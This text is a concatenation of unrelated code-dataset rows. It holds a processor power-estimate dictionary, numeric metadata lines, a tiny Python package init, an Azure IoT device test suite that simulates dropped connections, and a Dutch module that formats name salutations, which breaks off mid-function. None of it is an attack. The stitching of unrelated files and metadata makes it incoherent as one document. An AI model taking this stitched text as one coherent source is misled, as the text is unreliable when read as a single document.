'Execution Unit/Complex ALUs/Runtime Dynamic': 0.482294,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 1.92614,
'Execution Unit/Floating Point Units/Runtime Dynamic': 1.15137,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.122718,
'Execution Unit/Instruction Scheduler/Area': 2.17927,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.328073,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.00115349,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.20978,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.809466,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.017004,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00962066,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00730101,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 1.00996,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00529112,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 2.07911,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 1.4017,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0800117,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0455351,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 4.84781,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.841232,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.000856399,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.55892,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.836034,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.0178624,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00897339,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 3.0472,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.114878,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.0641291,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.504818,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.553165,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 9.34466,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.363889,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.0293438,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.345316,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.217015,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.709205,
'Execution Unit/Register Files/Runtime Dynamic': 0.246359,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0442632,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00607074,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.931951,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 1.92318,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.0920413,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0345155,
'Execution Unit/Runtime Dynamic': 7.40357,
'Execution Unit/Subthreshold Leakage': 1.83518,
'Execution Unit/Subthreshold Leakage with power gating': 0.709678,
'Gate Leakage': 0.372997,
'Instruction Fetch Unit/Area': 5.86007,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00302321,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00302321,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.00261805,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.0010052,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00311744,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.0117819,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.029528,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0590479,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.208622,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 6.43323,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.415192,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.708575,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 8.96874,
'Instruction Fetch Unit/Runtime Dynamic': 1.3737,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932587,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.408542,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0621302,
'L2/Runtime Dynamic': 0.0148419,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80969,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 6.50833,
'Load Store Unit/Data Cache/Runtime Dynamic': 2.54491,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0351387,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.170536,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.170536,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 7.31692,
'Load Store Unit/Runtime Dynamic': 3.55647,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.420513,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.841027,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591622,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283406,
'Memory Management Unit/Area': 0.434579,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.149242,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.150158,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00813591,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.399995,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0678153,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.816504,
'Memory Management Unit/Runtime Dynamic': 0.217973,
'Memory Management Unit/Subthreshold Leakage': 0.0769113,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0399462,
'Peak Dynamic': 31.0707,
'Renaming Unit/Area': 0.369768,
'Renaming Unit/FP Front End RAT/Area': 0.168486,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00489731,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 3.33511,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 1.26953,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0437281,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.024925,
'Renaming Unit/Free List/Area': 0.0414755,
'Renaming Unit/Free List/Gate Leakage': 4.15911e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0401324,
'Renaming Unit/Free List/Runtime Dynamic': 0.0566682,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000670426,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000377987,
'Renaming Unit/Gate Leakage': 0.00863632,
'Renaming Unit/Int Front End RAT/Area': 0.114751,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.00038343,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.86945,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.392345,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00611897,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00348781,
'Renaming Unit/Peak Dynamic': 4.56169,
'Renaming Unit/Runtime Dynamic': 1.71854,
'Renaming Unit/Subthreshold Leakage': 0.070483,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0362779,
'Runtime Dynamic': 14.2851,
'Subthreshold Leakage': 6.21877,
'Subthreshold Leakage with power gating': 2.58311}],
'DRAM': {'Area': 0,
'Gate Leakage': 0,
'Peak Dynamic': 2.581551508645094,
'Runtime Dynamic': 2.581551508645094,
'Subthreshold Leakage': 4.252,
'Subthreshold Leakage with power gating': 4.252},
'L3': [{'Area': 61.9075,
'Gate Leakage': 0.0484137,
'Peak Dynamic': 0.220707,
'Runtime Dynamic': 0.14111,
'Subthreshold Leakage': 6.80085,
'Subthreshold Leakage with power gating': 3.32364}],
'Processor': {'Area': 193.678,
'Gate Leakage': 1.54706,
'Peak Dynamic': 125.389,
'Peak Power': 158.681,
'Runtime Dynamic': 58.3378,
'Subthreshold Leakage': 31.7454,
'Subthreshold Leakage with power gating': 14.035,
'Total Cores/Area': 130.433,
'Total Cores/Gate Leakage': 1.49199,
'Total Cores/Peak Dynamic': 125.168,
'Total Cores/Runtime Dynamic': 58.1967,
'Total Cores/Subthreshold Leakage': 24.8751,
'Total Cores/Subthreshold Leakage with power gating': 10.3324,
'Total L3s/Area': 61.9075,
'Total L3s/Gate Leakage': 0.0484137,
'Total L3s/Peak Dynamic': 0.220707,
'Total L3s/Runtime Dynamic': 0.14111,
'Total L3s/Subthreshold Leakage': 6.80085,
'Total L3s/Subthreshold Leakage with power gating': 3.32364,
'Total Leakage': 33.2925,
'Total NoCs/Area': 1.3377,
'Total NoCs/Gate Leakage': 0.00666015,
'Total NoCs/Peak Dynamic': 0.0,
'Total NoCs/Runtime Dynamic': 0.0,
'Total NoCs/Subthreshold Leakage': 0.0694515,
'Total NoCs/Subthreshold Leakage with power gating': 0.0260443}} | 74.95186 | 124 | 0.681605 | 8,082 | 68,506 | 5.771591 | 0.05902 | 0.123826 | 0.113193 | 0.093641 | 0.954487 | 0.951529 | 0.946126 | 0.920336 | 0.910196 | 0.904536 | 0 | 0.130265 | 0.224666 | 68,506 | 914 | 125 | 74.95186 | 0.747943 | 0 | 0 | 0.715536 | 0 | 0 | 0.6584 | 0.04817 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
a87364fa491fdcf25ea24954e0ed9f9c56c07de4 | 39 | py | Python | cls/networks/__init__.py | megvii-model/MABN | db1ef7bc396c8aa6f4eec9e3c5875d73f74da3de | [
"MIT"
] | 182 | 2020-01-18T17:00:48.000Z | 2022-01-17T09:18:22.000Z | cls/networks/__init__.py | megvii-model/MABN | db1ef7bc396c8aa6f4eec9e3c5875d73f74da3de | [
"MIT"
] | 5 | 2020-01-24T09:12:14.000Z | 2020-05-12T07:56:28.000Z | cls/networks/__init__.py | megvii-model/MABN | db1ef7bc396c8aa6f4eec9e3c5875d73f74da3de | [
"MIT"
] | 25 | 2020-01-19T10:27:48.000Z | 2021-08-09T03:12:31.000Z | from . import MABN
from . import resnet | 19.5 | 20 | 0.769231 | 6 | 39 | 5 | 0.666667 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.179487 | 39 | 2 | 20 | 19.5 | 0.9375 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
a882101adbd1dfd72b9aec44689f90652ae97b5b | 6,419 | py | Python | device_e2e/aio/test_send_message.py | Azure/azure-iot-sdk-python | ba74e3b2a491115da2db35e0dc99864b0e368fb2 | [
"MIT"
] | 366 | 2016-12-02T20:38:05.000Z | 2022-03-29T10:08:14.000Z | device_e2e/aio/test_send_message.py | Azure/azure-iot-sdk-python | ba74e3b2a491115da2db35e0dc99864b0e368fb2 | [
"MIT"
] | 640 | 2016-12-16T21:59:48.000Z | 2022-03-30T20:17:52.000Z | device_e2e/aio/test_send_message.py | Azure/azure-iot-sdk-python | ba74e3b2a491115da2db35e0dc99864b0e368fb2 | [
"MIT"
] | 371 | 2016-11-16T16:06:04.000Z | 2022-03-31T10:10:57.000Z | # Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
import asyncio
import pytest
import logging
import json
import uuid
from azure.iot.device.exceptions import OperationCancelled
logger = logging.getLogger(__name__)
logger.setLevel(level=logging.INFO)
pytestmark = pytest.mark.asyncio
@pytest.mark.describe("Client send_message method")
class TestSendMessage(object):
@pytest.mark.it("Can send a simple message")
@pytest.mark.quicktest_suite
async def test_send_message(self, client, random_message, service_helper):
await client.send_message(random_message)
event = await service_helper.wait_for_eventhub_arrival(random_message.message_id)
assert event.system_properties["message-id"] == random_message.message_id
assert json.dumps(event.message_body) == random_message.data
@pytest.mark.it("Connects the transport if necessary")
@pytest.mark.quicktest_suite
async def test_connect_if_necessary(self, client, random_message, service_helper):
await client.disconnect()
assert not client.connected
await client.send_message(random_message)
assert client.connected
event = await service_helper.wait_for_eventhub_arrival(random_message.message_id)
assert json.dumps(event.message_body) == random_message.data
@pytest.mark.dropped_connection
@pytest.mark.describe("Client send_message method with dropped connections")
class TestSendMessageDroppedConnection(object):
@pytest.fixture(scope="class")
def extra_client_kwargs(self):
return {"keep_alive": 5}
@pytest.mark.it("Sends if connection drops before sending")
@pytest.mark.uses_iptables
async def test_sends_if_drop_before_sending(
self, client, random_message, dropper, service_helper
):
assert client.connected
dropper.drop_outgoing()
send_task = asyncio.create_task(client.send_message(random_message))
while client.connected:
await asyncio.sleep(1)
assert not send_task.done()
dropper.restore_all()
while not client.connected:
await asyncio.sleep(1)
await send_task
event = await service_helper.wait_for_eventhub_arrival(random_message.message_id)
logger.info("sent from device= {}".format(random_message.data))
logger.info("received at eventhub = {}".format(event.message_body))
assert json.dumps(event.message_body) == random_message.data
logger.info("Success")
@pytest.mark.it("Sends if connection rejects send")
@pytest.mark.uses_iptables
async def test_sends_if_reject_before_sending(
self, client, random_message, dropper, service_helper
):
assert client.connected
dropper.reject_outgoing()
send_task = asyncio.create_task(client.send_message(random_message))
while client.connected:
await asyncio.sleep(1)
assert not send_task.done()
dropper.restore_all()
while not client.connected:
await asyncio.sleep(1)
await send_task
event = await service_helper.wait_for_eventhub_arrival(random_message.message_id)
logger.info("sent from device= {}".format(random_message.data))
logger.info("received at eventhub = {}".format(event.message_body))
assert json.dumps(event.message_body) == random_message.data
logger.info("Success")
@pytest.mark.describe("Client send_message with reconnect disabled")
class TestSendMessageRetryDisabled(object):
@pytest.fixture(scope="class")
def extra_client_kwargs(self):
return {"keep_alive": 5, "connection_retry": False}
@pytest.fixture(scope="function", autouse=True)
async def reconnect_after_test(self, dropper, client):
yield
dropper.restore_all()
await client.connect()
assert client.connected
@pytest.mark.it("Can send a simple message")
async def test_send_message(self, client, random_message, service_helper):
await client.send_message(random_message)
event = await service_helper.wait_for_eventhub_arrival(random_message.message_id)
assert json.dumps(event.message_body) == random_message.data
@pytest.mark.it("Automatically connects if transport manually disconnected before sending")
async def test_connect_if_necessary(self, client, random_message, service_helper):
await client.disconnect()
assert not client.connected
await client.send_message(random_message)
assert client.connected
event = await service_helper.wait_for_eventhub_arrival(random_message.message_id)
assert json.dumps(event.message_body) == random_message.data
@pytest.mark.it("Automatically connects if transport automatically disconnected before sending")
@pytest.mark.uses_iptables
async def test_connects_after_automatic_disconnect(
self, client, random_message, dropper, service_helper
):
assert client.connected
dropper.drop_outgoing()
while client.connected:
await asyncio.sleep(1)
assert not client.connected
dropper.restore_all()
await client.send_message(random_message)
assert client.connected
event = await service_helper.wait_for_eventhub_arrival(random_message.message_id)
assert json.dumps(event.message_body) == random_message.data
@pytest.mark.it("Fails if connection disconnects before sending")
@pytest.mark.uses_iptables
async def test_fails_if_disconnect_before_sending(self, client, random_message, dropper):
assert client.connected
dropper.drop_outgoing()
send_task = asyncio.create_task(client.send_message(random_message))
while client.connected:
await asyncio.sleep(1)
with pytest.raises(OperationCancelled):
await send_task
@pytest.mark.it("Fails if connection drops before sending")
@pytest.mark.uses_iptables
async def test_fails_if_drop_before_sending(self, client, random_message, dropper):
assert client.connected
dropper.drop_outgoing()
with pytest.raises(OperationCancelled):
await client.send_message(random_message)
assert not client.connected
| 33.60733 | 100 | 0.720361 | 775 | 6,419 | 5.740645 | 0.171613 | 0.10227 | 0.045853 | 0.046527 | 0.810969 | 0.784446 | 0.763093 | 0.724657 | 0.709822 | 0.676107 | 0 | 0.001552 | 0.197071 | 6,419 | 190 | 101 | 33.784211 | 0.861661 | 0.023368 | 0 | 0.723077 | 0 | 0 | 0.10854 | 0 | 0 | 0 | 0 | 0 | 0.176923 | 1 | 0.015385 | false | 0 | 0.046154 | 0.015385 | 0.1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
a89d4deaf7ad2368e29f2a367566582bc3ef87b8 | 7,418 | py | Python | src/openpersonen/features/aanschrijfwijze/aanschrijfwijze.py | maykinmedia/open-personen | ddcf083ccd4eb864c5305bcd8bc75c6c64108272 | [
"RSA-MD"
] | 2 | 2020-08-26T11:24:43.000Z | 2021-07-28T09:46:40.000Z | src/openpersonen/features/aanschrijfwijze/aanschrijfwijze.py | maykinmedia/open-personen | ddcf083ccd4eb864c5305bcd8bc75c6c64108272 | [
"RSA-MD"
] | 153 | 2020-08-26T10:45:35.000Z | 2021-12-10T17:33:16.000Z | src/openpersonen/features/aanschrijfwijze/aanschrijfwijze.py | maykinmedia/open-personen | ddcf083ccd4eb864c5305bcd8bc75c6c64108272 | [
"RSA-MD"
] | null | null | null | from openpersonen.features.constants import *
def get_aanschrijfwijze_first_name(first_name):
split_first_name = first_name.split()
return "".join(f"{name[0]}." for name in split_first_name)
def get_aanschrijfwijze_with_title(
last_name_prefix,
last_name,
first_name,
partner_last_name_prefix,
partner_last_name,
indication_name_use,
title,
):
last_name_prefix = last_name_prefix if isinstance(last_name_prefix, str) else None
last_name = last_name if isinstance(last_name, str) else None
first_name = first_name if isinstance(first_name, str) else None
partner_last_name_prefix = (
partner_last_name_prefix if isinstance(partner_last_name_prefix, str) else None
)
partner_last_name = (
partner_last_name if isinstance(partner_last_name, str) else None
)
indication_name_use = (
indication_name_use if isinstance(indication_name_use, str) else None
)
title = title if isinstance(title, str) else None
aanschrijfwijze = ""
if indication_name_use == EIGEN:
aanschrijfwijze = (
f"{title.lower()} {get_aanschrijfwijze_first_name(first_name)}"
)
if last_name_prefix:
aanschrijfwijze += f" {last_name_prefix}"
aanschrijfwijze += f" {last_name}"
elif indication_name_use == PARTNER_NA_EIGEN:
aanschrijfwijze = (
f"{title.lower()} {get_aanschrijfwijze_first_name(first_name)}"
)
if last_name_prefix:
aanschrijfwijze += f" {last_name_prefix}"
aanschrijfwijze += f" {last_name}-"
if partner_last_name_prefix:
aanschrijfwijze += f"{partner_last_name_prefix} "
aanschrijfwijze += f"{partner_last_name}"
elif indication_name_use == PARTNER_VOOR_EIGEN:
aanschrijfwijze = f"{get_aanschrijfwijze_first_name(first_name)}"
if partner_last_name_prefix:
aanschrijfwijze += f" {partner_last_name_prefix}"
aanschrijfwijze += f" {partner_last_name}-{title.lower()}"
if last_name_prefix:
aanschrijfwijze += f" {last_name_prefix}"
aanschrijfwijze += f" {last_name}"
return aanschrijfwijze
def get_aanschrijfwijze_based_on_partner_title(
last_name_prefix,
last_name,
first_name,
partner_last_name_prefix,
partner_last_name,
indication_name_use,
partner_title,
):
aanschrijfwijze = ""
if indication_name_use == PARTNER_NA_EIGEN:
aanschrijfwijze = f"{get_aanschrijfwijze_first_name(first_name)}"
if last_name_prefix:
aanschrijfwijze += f" {last_name_prefix}"
aanschrijfwijze += (
f" {last_name}-{MALE_TO_FEMALE_TITLES[partner_title].lower()}"
)
if partner_last_name_prefix:
aanschrijfwijze += f" {partner_last_name_prefix}"
aanschrijfwijze += f" {partner_last_name}"
elif indication_name_use == PARTNER:
aanschrijfwijze = f"{get_aanschrijfwijze_first_name(first_name)} {MALE_TO_FEMALE_TITLES[partner_title].lower()}"
if partner_last_name_prefix:
aanschrijfwijze += f" {partner_last_name_prefix}"
aanschrijfwijze += f" {partner_last_name}"
elif indication_name_use == PARTNER_VOOR_EIGEN:
aanschrijfwijze = f"{get_aanschrijfwijze_first_name(first_name)} {MALE_TO_FEMALE_TITLES[partner_title].lower()}"
if last_name_prefix and partner_last_name_prefix:
aanschrijfwijze += f" {partner_last_name_prefix}"
aanschrijfwijze += f" {partner_last_name}-"
if last_name_prefix:
aanschrijfwijze += f"{last_name_prefix} "
aanschrijfwijze += f"{last_name}"
return aanschrijfwijze
def get_default_aanschrijfwijze(
last_name_prefix,
last_name,
first_name,
partner_last_name_prefix,
partner_last_name,
indication_name_use,
):
aanschrijfwijze = ""
if indication_name_use == EIGEN:
aanschrijfwijze = f"{get_aanschrijfwijze_first_name(first_name)}"
if last_name_prefix:
aanschrijfwijze += f" {last_name_prefix}"
aanschrijfwijze += f" {last_name}"
elif indication_name_use == PARTNER_NA_EIGEN:
aanschrijfwijze = f"{get_aanschrijfwijze_first_name(first_name)}"
if last_name_prefix:
aanschrijfwijze += f" {last_name_prefix}"
aanschrijfwijze += f" {last_name}-"
if partner_last_name_prefix:
aanschrijfwijze += f"{partner_last_name_prefix} "
aanschrijfwijze += f"{partner_last_name}"
elif indication_name_use == PARTNER:
aanschrijfwijze = f"{get_aanschrijfwijze_first_name(first_name)}"
if partner_last_name_prefix:
aanschrijfwijze += f" {partner_last_name_prefix}"
aanschrijfwijze += f" {partner_last_name}"
elif indication_name_use == PARTNER_VOOR_EIGEN:
aanschrijfwijze = f"{get_aanschrijfwijze_first_name(first_name)}"
if partner_last_name_prefix:
aanschrijfwijze += f" {partner_last_name_prefix}"
aanschrijfwijze += f" {partner_last_name}-"
if last_name_prefix:
aanschrijfwijze += f"{last_name_prefix} "
aanschrijfwijze += f"{last_name}"
return aanschrijfwijze
def get_aanschrijfwijze(
last_name_prefix,
last_name,
first_name,
partner_last_name_prefix,
partner_last_name,
indication_name_use,
gender_designation,
title,
partner_title,
):
last_name_prefix = last_name_prefix if isinstance(last_name_prefix, str) else None
last_name = last_name if isinstance(last_name, str) else None
first_name = first_name if isinstance(first_name, str) else None
partner_last_name_prefix = (
partner_last_name_prefix if isinstance(partner_last_name_prefix, str) else None
)
partner_last_name = (
partner_last_name if isinstance(partner_last_name, str) else None
)
indication_name_use = (
